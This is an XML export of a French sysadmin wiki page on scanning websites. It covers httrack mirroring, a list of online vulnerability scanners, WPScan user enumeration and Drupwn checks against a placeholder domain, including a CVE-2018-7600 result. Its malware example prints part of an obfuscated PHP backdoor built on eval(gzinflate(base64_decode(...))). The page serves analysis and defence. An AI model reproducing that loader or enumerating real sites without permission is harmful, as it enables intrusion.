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an_site_web"/><text:bookmark-start text:name="__RefHeading___scan_site_web_1"/><text:bookmark-start text:name="scan_site_web"/>Scan site Web<text:bookmark-end text:name="__RefHeading___scan_site_web_1"/><text:bookmark-end text:name="scan_site_web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kvz.io/blog/obtain-all-text-from-your-website.html" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://kvz.io/blog/obtain-all-text-from-your-website.html</text:a></text:p>
        </text:list-item>
      </text:list>
      <text:p text:style-name="Text_20_body">httrack - Télécharger tous les fichiers .j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track -<text:span text:style-name="highlight_sy0">*</text:span> +mime:text<text:span text:style-name="highlight_sy0">/</text:span>html +<text:span text:style-name="highlight_sy0">*</text:span>.js<text:line-break/><text:span text:style-name="highlight_co0">#httrack --mirror https://www.acme.fr -* +mime:text/html +*.js -r9999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p <text:span text:style-name="highlight_kw2">install</text:span> pyFreenet3 <text:span text:style-name="highlight_re5">--use-pep517</text:span><text:line-break/>.<text:span text:style-name="highlight_sy0">/</text:span>bin<text:span text:style-name="highlight_sy0">/</text:span>copyweb <text:span text:style-name="highlight_re5">--mirror</text:span> http:<text:span text:style-name="highlight_sy0">//</text:span>www.acme.fr <text:span text:style-name="highlight_re5">-d</text:span> sites<text:span text:style-name="highlight_sy0">/</text:span></text:p>
          </table:table-cell>
        </table:table-row>
      </table:table>
      <text:p text:style-name="Text_20_body">Voir <text:a xlink:type="simple" xlink:href="https://doc.ubuntu-fr.org/httrack" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://doc.ubuntu-fr.org/httrack</text:a></text:p>
      <text:h text:style-name="Heading_20_2" text:outline-level="2"><text:bookmark-start text:name="__RefHeading___scan_en_ligne_2"/><text:bookmark-start text:name="scan_en_ligne"/>Scan en ligne<text:bookmark-end text:name="__RefHeading___scan_en_ligne_2"/><text:bookmark-end text:name="scan_en_ligne"/></text:h>
      <text:p text:style-name="Text_20_body">Voir : <text:a xlink:type="simple" xlink:href="https://www.owasp.org/index.php/Category:Vulnerability_Scanning_Tools" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://www.owasp.org/index.php/Category:Vulnerability_Scanning_Tools</text:a></text:p>
      <text:p text:style-name="Text_20_body">Liste de scanners :</text:p>
      <text:list text:style-name="List_20_1" text:continue-numbering="false">
        <text:list-item>
          <text:p text:style-name="List_20_1_Content_First"> <text:a xlink:type="simple" xlink:href="https://www.virustotal.com" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://www.virustotal.com</text:a></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content"> <text:a xlink:type="simple" xlink:href="https://observatory.mozilla.org/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://observatory.mozilla.org/</text:a></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content"> <text:a xlink:type="simple" xlink:href="https://sitecheck.sucuri.net/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://sitecheck.sucuri.net/</text:a></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content"> <text:a xlink:type="simple" xlink:href="https://app.upguard.com/webscan#" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://app.upguard.com/webscan#</text:a></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content"> <text:a xlink:type="simple" xlink:href="https://app.webinspector.com" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://app.webinspector.com</text:a></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content_Last"> <text:a xlink:type="simple" xlink:href="https://wpscans.com/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://wpscans.com/</text:a></text:p>
        </text:list-item>
      </text:list>
      <text:h text:style-name="Heading_20_3" text:outline-level="3"><text:bookmark-start text:name="__RefHeading___scan_wordpress_3"/><text:bookmark-start text:name="scan_wordpress"/>Scan Wordpress<text:bookmark-end text:name="__RefHeading___scan_wordpress_3"/><text:bookmark-end text:name="scan_wordpress"/></text:h>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://github.com/wpscanteam/wpscan" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://github.com/wpscanteam/wpscan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 wpscanteam<text:span text:style-name="highlight_sy0">/</text:span>wpscan <text:span text:style-name="highlight_re5">--url</text:span> http:<text:span text:style-name="highlight_sy0">//</text:span>www.acme.fr <text:span text:style-name="highlight_re5">--enumerate</text:span> u</text:p>
          </table:table-cell>
        </table:table-row>
      </table:table>
      <text:h text:style-name="Heading_20_3" text:outline-level="3"><text:bookmark-start text:name="__RefHeading___scan_drupal_4"/><text:bookmark-start text:name="scan_drupal"/>Scan Drupal<text:bookmark-end text:name="__RefHeading___scan_drupal_4"/><text:bookmark-end text:name="scan_drup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git clone https://github.com/immunIT/drupwn</text:span><text:line-break/><text:span text:style-name="highlight_co0">#pip install --user -r requirements.txt</text:span><text:line-break/>docker run <text:span text:style-name="highlight_re5">--rm</text:span> <text:span text:style-name="highlight_re5">-it</text:span> immunit<text:span text:style-name="highlight_sy0">/</text:span>drupwn enum https:<text:span text:style-name="highlight_sy0">//</text:span>www.acme.fr</text:p>
          </table:table-cell>
        </table:table-row>
      </table:table>
      <text:p text:style-name="Preformatted_20_Text">Drupwn&gt; check CVE-2018-7600<text:line-break/><text:line-break/>[+] Application vulnerable</text:p>
      <text:h text:style-name="Heading_20_2" text:outline-level="2"><text:bookmark-start text:name="__RefHeading___exemple_de_malware_5"/><text:bookmark-start text:name="exemple_de_malware"/>Exemple de malware<text:bookmark-end text:name="__RefHeading___exemple_de_malware_5"/><text:bookmark-end text:name="exemple_de_malware"/></text:h>
      <text:p text:style-name="Preformatted_20_Text">stat m7hw6o0xhn.php<text:s text:c="122"/><text:line-break/><text:s text:c="2"/>File: 'm7hw6o0xhn.php'<text:line-break/><text:s text:c="2"/>Size: 1797<text:s text:c="12"/>Blocks: 8<text:s text:c="10"/>IO Block: 4096<text:s text:c="3"/>regular file<text:line-break/>Device: fc07h/64519d<text:s text:c="4"/>Inode: 596<text:s text:c="9"/>Links: 1<text:line-break/>Access: (0644/-rw-r--r--)<text:s text:c="2"/>Uid: ( 1000/sftp-acme)<text:s text:c="3"/>Gid: ( 1000/sftp-acme)<text:line-break/>Access: 2019-02-08 15:26:13.957265343 +0100<text:line-break/>Modify: 2018-03-27 10:53:45.000000000 +0200<text:line-break/>Change: 2018-05-22 18:02:27.736483258 +0200<text:line-break/> Birth: -</text:p>
      <text:p text:style-name="Text_20_body"><text:span text:style-name="Source_20_Text">/var/www/acme.fr/www.acme.fr/m7hw6o0xhn.php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eval" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link"><text:span text:style-name="highlight_kw3">eval</text:span></text:a><text:span text:style-name="highlight_br0">(</text:span><text:span text:style-name="highlight_st0">"<text:span text:style-name="highlight_es1">\n</text:span><text:span text:style-name="highlight_es1">\$</text:span>dgreusdi = intval(__LINE__) * 337;"</text:span><text:span text:style-name="highlight_br0">)</text:span><text:span text:style-name="highlight_sy0">;</text:span><text:line-break/> <text:line-break/><text:span text:style-name="highlight_re0">$a</text:span> <text:span text:style-name="highlight_sy0">=</text:span> <text:span text:style-name="highlight_st0">"0123456789abcdef"</text:span><text:span text:style-name="highlight_sy0">;</text:span><text:line-break/><text:span text:style-name="highlight_re0">$a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re0">$dgreusdi</text:span><text:span text:style-name="highlight_sy0">,</text:span> <text:span text:style-name="highlight_st0">"E"</text:span><text:span text:style-name="highlight_sy0">,</text:span> <text:span text:style-name="highlight_re0">$a</text:span><text:span text:style-name="highlight_br0">)</text:span><text:span text:style-name="highlight_sy0">;</text:span><text:line-break/><text:a xlink:type="simple" xlink:href="http://www.php.net/eval" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link"><text:span text:style-name="highlight_kw3">eval</text:span></text:a> <text:span text:style-name="highlight_br0">(</text:span><text:a xlink:type="simple" xlink:href="http://www.php.net/gzinflate" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link"><text:span text:style-name="highlight_kw3">gzinflate</text:span></text:a><text:span text:style-name="highlight_br0">(</text:span><text:a xlink:type="simple" xlink:href="http://www.php.net/base64_decode" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link"><text:span text:style-name="highlight_kw3">base64_decode</text:span></text:a><text:span text:style-name="highlight_br0">(</text:span><text:span text:style-name="highlight_re0">$a</text:span><text:span text:style-name="highlight_br0">)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41</meta:creation-date>
    <dc:creator>Generated</dc:creator>
    <dc:date>2026-07-21T19::43:41</dc:date>
    <dc:language>en-US</dc:language>
    <meta:editing-cycles>1</meta:editing-cycles>
    <meta:editing-duration>PT0S</meta:editing-duration>
    <dc:title>tech:scan_site_web</dc:title>
  </office:meta>
</office:document-meta>
</file>